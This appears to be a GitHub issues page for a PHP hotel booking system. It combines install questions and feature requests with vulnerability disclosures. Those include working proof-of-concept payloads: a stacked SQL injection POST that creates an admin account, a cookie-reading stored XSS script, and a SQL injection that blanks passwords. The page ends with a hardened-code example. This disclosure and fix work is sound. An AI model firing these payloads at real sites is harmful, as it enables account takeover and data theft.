tramyardg / hotel-mgmt-system
Hotel booking system for customers added with an admin feature to manage reservations.
License: Apache License 2.0
Hey,
I couldn't access the admin panel; it displays an empty page.
That's the link I used: http://localhost/hotel-mgmt-system/admin.php
Normalize the customer table in 2NF. The new entity will be called admins, alongside the existing customer table.
Sq code
Vulnerable path /app/process_update_profile.php
Lines 32-37 of "process_update_profile.php" don't differentiate the user's permissions and the login status.
Post the data to "process_update_profile.php". An attacker only needs a real user's email; then the attacker can change another user's password, phone and so on. The attacker can get the admin's account.
Check the database and find the differences.
A simple approach is to put "pending" in the search input value. This will display all the pending rsvp.
The problem was that admin credentials are exposed in admin.json. For security reasons, we have to create a field in the customer table to tell if the user is an admin or not. Therefore, we don't need admin.json anymore for authenticating admins.
Files to modify:
hotel.sql
app/models/Customer.php: isAdminSignedIn
Vulnerable path /app/dao/BookingDetailDAO.php
Vulnerable path /app/handlers/BookingDetailHandler.php
Vulnerable path /app/admin/manage_reservation.php
Lines 54-60 of "BookingDetailDAO.php": the variable i is spliced into the SQL statement. It causes SQL injection.
Lines 63-74 of "BookingDetailHandler.php": updateConfirmed is called by confirmSelection.
Line 10 of "manage_reservation.php": $bdh->confirmSelection($_POST["item"]);
We could inject through the POST item.
Read the README.md and install the project.
Post the PoC code.
POST /app/admin/manage_reservation.php HTTP/1.1
Host: localhost
Content-Length: 119
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: elefant_user=ohao1ku87687qe855jotru3o5p; PHPSESSID=19q15nrh1hinhipjeomugnaqd2
Connection: close
confirm=1&item[0]=11;INSERT INTO customer(cid,fullname,email,password,phone,isadmin) values(2,"attack","a","a","1","1")
Is composer necessary to run this? Any tips on how to install an older version of PHP using XAMPP?
Edit: I was able to get it.
How do I create admin credentials?
In the registration and sign-in pages, add a button or a link to go back to the home page.
Vulnerable path /app/process_update_profile.php
Lines 32-37 of the "process_update_profile.php" file have no filtering, which causes Cross Site Scripting.
In fact, the filter was forgotten. Another file has a filter; its path is /app/process_registration.php.
The data is safe when the user registers, but it is unsafe after an update.
Register a new account.
Log in as the user and click "update profile".
Input the PoC and submit.
The administrator will trigger it.
<script>alert('youyou_pm10'+document.cookie);</script>
Hi,
Sorry to bother, I was wondering how to access the admin panel?
I set up everything, tried /app, /admin.php etc.
Thanks in advance.
Any takers? Feel free. You can use the png below
favicon_package_v0.16.zip
Insert the following code in the <head> section:
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">
How to fix it?
A simple approach is to put "confirmed" in the search input value. This will display all the confirmed rsvp.
Vulnerable path /app/dao/CustomerDAO.php
Vulnerable path /app/handlers/CustomerHandler.php
Vulnerable path /app/process_update_profile.php
Lines 49-59 of the "CustomerDAO.php" file splice the SQL string together, so the PDO protection is bypassed.
Line 98 of "CustomerHandler.php" uses the vulnerable function.
Lines 31-40 of "process_update_profile.php" use the vulnerable function.
After the user has logged in, click the button "update profile".
Then input the PoC and click "update".
After that, refresh it and click "update profile"; you can see the data from the database.
youyou",password = "", phone = concat(database(),version()) WHERE `customer`.`cid`="10"#
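Hardened versions of the code paths reported in the issues above, as an added example that is not the project's code: the admin check meant to replace admin.json (isAdminSignedIn), the id list passed from confirmSelection to BookingDetailDAO, the profile UPDATE in CustomerDAO, and output escaping for the stored XSS in the update-profile flow. The customer table and its cid, fullname, email, phone and isadmin columns come from the reports; the bookingdetail table, its bid and status columns, and the $_SESSION['cid'] key are assumptions.

```php
<?php
// Added example, not the project's code. Table "customer" and its columns
// cid, fullname, email, phone, isadmin come from the reports above; the
// bookingdetail table, its bid/status columns and $_SESSION['cid'] are assumptions.
declare(strict_types=1);

// Authorization is read from the signed-in customer's row, not from admin.json.
function isAdminSignedIn(PDO $pdo): bool
{
    if (empty($_SESSION['cid'])) {
        return false;
    }
    $stmt = $pdo->prepare('SELECT isadmin FROM customer WHERE cid = :cid');
    $stmt->execute([':cid' => (int) $_SESSION['cid']]);
    return (bool) $stmt->fetchColumn();
}

// One "?" placeholder per id instead of splicing $_POST["item"] into the query;
// every id is cast to int, so a stacked statement never reaches the SQL parser.
function updateConfirmed(PDO $pdo, array $ids): int
{
    $ids = array_values(array_map('intval', $ids));
    if ($ids === []) {
        return 0;
    }
    $in = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $pdo->prepare("UPDATE bookingdetail SET status = 'confirmed' WHERE bid IN ($in)");
    $stmt->execute($ids);
    return $stmt->rowCount();
}

// Named placeholders for every user-supplied value, and the row is chosen by the
// signed-in user's own cid, never by an email or cid taken from the POST body.
function updateProfile(PDO $pdo, int $cid, string $fullname, string $email, string $phone): int
{
    $stmt = $pdo->prepare(
        'UPDATE customer SET fullname = :fullname, email = :email, phone = :phone WHERE cid = :cid'
    );
    $stmt->execute([':fullname' => $fullname, ':email' => $email, ':phone' => $phone, ':cid' => $cid]);
    return $stmt->rowCount();
}

// Escape at output time, so a stored <script> in a profile field is rendered as
// text on the admin page; filtering only at registration (as the report notes) is not enough.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
```

Call isAdminSignedIn() at the top of manage_reservation.php before confirmSelection() runs, and pass $_POST['item'] straight to updateConfirmed(); every field printed by the admin pages goes through e().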